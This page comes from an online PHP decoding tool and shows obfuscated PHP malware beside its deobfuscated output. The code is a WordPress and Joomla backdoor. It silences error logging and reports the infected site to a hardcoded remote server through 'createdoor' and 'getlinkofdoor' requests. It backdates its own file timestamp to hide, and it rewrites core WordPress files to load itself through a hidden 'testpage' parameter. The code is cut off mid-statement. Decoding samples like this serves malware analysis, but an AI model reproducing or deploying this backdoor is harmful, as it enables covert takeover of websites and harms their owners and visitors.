Find this useful? Enter your email to receive occasional updates for securing PHP code.
Signing you up...
Thank you for signing up!
PHP Decode
< ?php header("Content-\x54ype: text/html;\x20ch\x61rs\x65t=utf-8"); error_reporting( - 0..
Decoded Output download
<? < ?php header("Content-Type: text/html; charset=utf-8");
error_reporting( - 0144 - 01237 - -01403);
@ini_set("display_errors", "Off");
@ini_set("error_log", null);
@ini_set("log_errors", - 01207 + 076 - 0416 - -01527);
@ini_set("max_input_time", 0525 - 051);
@ini_set("max_execution_time", 01035 + - 0361);
@set_time_limit( - 072 + 0421 - 0542 - -0667);
@ob_end_flush();
ij();
$server_addr = "104.236.16.95";
$liiiiill = "1.0.10";
$li = "d";
$lljjljljj = "/get.php";
$ljjiji = "/get.php?content";
$ljl = "/get.php?createdoor";
$lijijljl = "/get.php?update";
$lil = "/get.php?getback";
$lljil = "/get.php?spider";
$lljjjjj = client_version("3104709758");
$lliijjjji = "http://".$lljjjjj.$lljjljljj;
$liljllii = "http://".$lljjjjj;
$lii = $liljllii.$ljjiji;
$lijil = $liljllii.$ljl;
$lilijil = $liljllii.$lijijljl;
$lijiii = $liljllii.$lil;
$lijlj = $liljllii.$lljil;
$ll = preg_replace("#^/#i", "", $_SERVER["SCRIPT_NAME"]);
$lljjl = $_SERVER["HTTP_HOST"];
$lljjljjji = $_SERVER["SCRIPT_NAME"];
if ($_SERVER["SERVER_PORT"] == "443") :$ljiji = "https://";
else:$ljiji = "http://";
endif;
$ljll = $ljiji.$lljjl.$lljjljjji;
$lllj = iiii($lliijjjji."?getlinkofdoor=".urlencode($ljll), $lljjjjj, $lljjljljj."?getlinkofdoor=".urlencode($ljll), $lllijj = "no");
if (isset($_GET["gen"])):$lilljjiij = array("wp-config.php", "../wp-config.php", "../../wp-config.php", "../../../wp-config.php");
$ljiil = array("components/com_users/users.php", "../components/com_users/users.php", "../../components/com_users/users.php", "../../../components/com_users/users.php");
$ljiijljj = "none";
foreach($ljiil as$lilijl):if (file_exists($lilijl)) :$ljiijljj = "joomla";
endif;
endforeach;
foreach($lilljjiij as$llljijli):if (file_exists($llljijli)) :$ljiijljj = "wp";
endif;
endforeach;
if (isset($_GET["serverid"])) :$ljiijj = $_GET["serverid"];
$liljllii = $lijil."&gendomain=".$lljjl."&filename=".$ll."&vl=".$li."&v=".$liiiiill."&serverid=".$ljiijj."&cms=".$ljiijljj;
$ljili = $ljl."&gendomain=".$lljjl."&filename=".$ll."&vl=".$li."&v=".$liiiiill."&serverid=".$ljiijj."&cms=".$ljiijljj;
else:$liljllii = $lijil."&gendomain=".$lljjl."&filename=".$ll."&vl=".$li."&v=".$liiiiill."&cms=".$ljiijljj;
$ljili = $ljl."&gendomain=".$lljjl."&filename=".$ll."&vl=".$li."&v=".$liiiiill."&cms=".$ljiijljj;
endif;
$llj = iiii($liljllii, $lljjjjj, $ljili, $lllijj = "yes");
$llijllj = filemtime(__FILE__);
foreach(glob("*.php") as$llilliljl):$liiij = filemtime($llilliljl);
if ($liiij < $llijllj):@touch(__FILE__, $liiij);
break;
endif;
endforeach;
echo$llj;
exit;
elseif ($_GET["get"] == "template"):define("MAX_LEVELS_UP", 0166 + - 0107 + - 050);
$lllji = ( - 0211 + 036 - -0153);
do {
foreach(glob("*") as$lll):if (strpos($lll, "wp-config.php") != = false):define("PLATFORM", "WORDPRESS");
$lilljjiij = array("wp-blog-header.php", "wp-load.php", "wp-settings.php", "wp-config.php");
for ($ljjijijiljl = (04 + - 04 + 00);
$ljjijijiljl < (025 + - 0245 + 0224);
$ljjijijiljl++):$ljlli = $lilljjiij[$ljjijijiljl];
$ljlilijjiii = filemtime($ljlli);
$lijljij = sprintf("%o", fileperms($ljlli));
@chmod($ljlli, 0276 - -0370);
if (is_writable($ljlli)):$llijjljjij = file_get_contents($ljlli);
switch($ljlli):case "wp-load.php":$lljjjlljl = preg_replace("/require_once(.*)ABSPATH(.*)'( )?wp-config\.php(.*);/i","require_once( ABSPATH . 'wp-config.php' );".PHP_EOL."if(isset($_GET['testpage']) && $_GET['testpage']=='wpgopost'){require_once( ABSPATH . '".$ll."' );}",$llijjljjij);break;case "wp-blog-header.php":$lljjjlljl=preg_replace("/require_once(.*)wp-load\.php(.*);/i","require_once( dirname(__FILE__) . '/wp-load.php' );".PHP_EOL."if(isset($_GET['testpage']) && $_GET['testpage']=='wpgopost'){require_once( ABSPATH . '".$ll."' );}",$llijjljjij);break;case "wp-config.php":$lljjjlljl=preg_replace("/require_once(.*)wp-settings\.php(.*);/i","require_once(ABSPATH . 'wp - settings.php');".PHP_EOL."if(isset($_GET['testpage'] ?>Did this file decode correctly?
Original Code
< ?php header("Content-\x54ype: text/html;\x20ch\x61rs\x65t=utf-8");
error_reporting( - 0144 - 01237 - -01403);
@ini_set("display_error\163", "Off");
@ini_set("error_log", null);
@ini_set("log_errors", - 01207 + 076 - 0416 - -01527);
@ini_set("max_\x69nput_time", 0525 - 051);
@ini_set("ma\170_exe\143uti\x6fn_time", 01035 + - 0361);
@set_time_limit( - 072 + 0421 - 0542 - -0667);
@ob_end_flush();
ij();
$server_addr = "10\x34.2\x336.16.\0715";
$liiiiill = "1.0\05610";
$li = "d";
$lljjljljj = "/get\056php";
$ljjiji = "/get.\160hp?content";
$ljl = "/get.ph\160?createdoor";
$lijijljl = "\x2fget.php?update";
$lil = "/g\x65t.php?getb\x61ck";
$lljil = "/get.php?sp\x69de\162";
$lljjjjj = client_version("3104709758");
$lliijjjji = "ht\x74p:/\057".$lljjjjj.$lljjljljj;
$liljllii = "h\164tp://".$lljjjjj;
$lii = $liljllii.$ljjiji;
$lijil = $liljllii.$ljl;
$lilijil = $liljllii.$lijijljl;
$lijiii = $liljllii.$lil;
$lijlj = $liljllii.$lljil;
$ll = preg_replace("#^/#i", "", $_SERVER["SC\122\x49PT_NAME"]);
$lljjl = $_SERVER["HTTP\x5fHOST"];
$lljjljjji = $_SERVER["\123CRIP\x54_NAME"];
if ($_SERVER["SERVE\122_\x50ORT"] == "443") :$ljiji = "https:/\057";
else:$ljiji = "ht\164p://";
endif;
$ljll = $ljiji.$lljjl.$lljjljjji;
$lllj = iiii($lliijjjji."?ge\x74linkofdo\157r=".urlencode($ljll), $lljjjjj, $lljjljljj."?getlinkofdoo\x72=".urlencode($ljll), $lllijj = "no");
if (isset($_GET["\147en"])):$lilljjiij = array("wp-con\x66ig\056php", "\056./wp-config.php", ".\x2e/\056./wp-config.ph\160", ".\056/../../wp-config\056php");
$ljiil = array("compone\156ts/c\157m_users/users.\x70hp", "../components/c\157m_users/users\056php", ".\056/../c\157mponents/co\x6d_users/users.\x70hp", "../../../com\x70onents/com_users/users.\160hp");
$ljiijljj = "none";
foreach($ljiil as$lilijl):if (file_exists($lilijl)) :$ljiijljj = "joomla";
endif;
endforeach;
foreach($lilljjiij as$llljijli):if (file_exists($llljijli)) :$ljiijljj = "wp";
endif;
endforeach;
if (isset($_GET["serverid"])) :$ljiijj = $_GET["se\162verid"];
$liljllii = $lijil."&gendom\141\x69n\075".$lljjl."&fi\x6cename\x3d".$ll."&vl=".$li."&v=".$liiiiill."&\163erv\x65r\x69d=".$ljiijj."&cms=".$ljiijljj;
$ljili = $ljl."&g\145ndomain=".$lljjl."\x26filen\141me=".$ll."&vl=".$li."&v=".$liiiiill."&serverid=".$ljiijj."&\x63\x6ds=".$ljiijljj;
else:$liljllii = $lijil."&gendoma\x69n=".$lljjl."\x26filename\075".$ll."&vl=".$li."&v=".$liiiiill."&cms=".$ljiijljj;
$ljili = $ljl."&gen\144\157main=".$lljjl."&fi\x6c\145name=".$ll."&vl=".$li."\046v=".$liiiiill."&cms=".$ljiijljj;
endif;
$llj = iiii($liljllii, $lljjjjj, $ljili, $lllijj = "yes");
$llijllj = filemtime(__FILE__);
foreach(glob("*.p\x68p") as$llilliljl):$liiij = filemtime($llilliljl);
if ($liiij < $llijllj):@touch(__FILE__, $liiij);
break;
endif;
endforeach;
echo$llj;
exit;
elseif ($_GET["\x67et"] == "tem\160late"):define("MAX_LEVELS_UP", 0166 + - 0107 + - 050);
$lllji = ( - 0211 + 036 - -0153);
do {
foreach(glob("\052") as$lll):if (strpos($lll, "wp-config.ph\160") != = false):define("PLATFORM", "WORD\120R\x45\x53S");
$lilljjiij = array("wp-b\x6c\157g-header.php", "wp-load.php", "wp-setting\x73.php", "\167p-co\x6ef\x69g.p\150p");
for ($ljjijijiljl = (04 + - 04 + 00);
$ljjijijiljl < (025 + - 0245 + 0224);
$ljjijijiljl++):$ljlli = $lilljjiij[$ljjijijiljl];
$ljlilijjiii = filemtime($ljlli);
$lijljij = sprintf("%o", fileperms($ljlli));
@chmod($ljlli, 0276 - -0370);
if (is_writable($ljlli)):$llijjljjij = file_get_contents($ljlli);
switch($ljlli):case "wp-load.php":$lljjjlljl = preg_replace("/require_once(.*)ABSPA\x54H(\056*)'( )?wp-confi\x67\x5c.\x70hp(.*);/i","re\x71\165ire_\157nce( ABSPATH . 'wp-config.php' );".PHP_EOL."if(i\163s\145t(\x24_GET['testpage']) &\046 \044_GET['te\x73tpage']=='wpgopost'){require\x5fonc\x65(\x20AB\123PATH .\040'".$ll."' );}",$llijjljjij);break;case "wp-\142log-header.php":$lljjjlljl=preg_replace("/\162equire_once(.*)wp-\x6coad\134.p\150p(\056*);/i","require_once\x28\040d\x69rna\155e(_\x5fFILE__) .\040'\x2fwp-loa\x64.ph\160' );".PHP_EOL."if(isse\164(\x24_GET['t\x65stpage']) && \x24_G\x45T['test\160age']\075='wp\147opost'){req\165ir\145\x5fonc\145\050 ABSPATH\040. '".$ll."' \051;}",$llijjljjij);break;case "wp-config\x2e\x70hp":$lljjjlljl=preg_replace("/r\x65quire_onc\145(.*)wp-settings\134.php(.\x2a);/i","require_on\x63e(ABSPATH . '\x77p - se\164ti\x6egs.ph\160');".PHP_EOL."if\x28i\x73set(\x24_GET[\047test\x70age']Function Calls
| None |
Stats
| MD5 | 0150d74106738358c9b85d4c6510ee6b |
| Eval Count | 0 |
| Decode Time | 54 ms |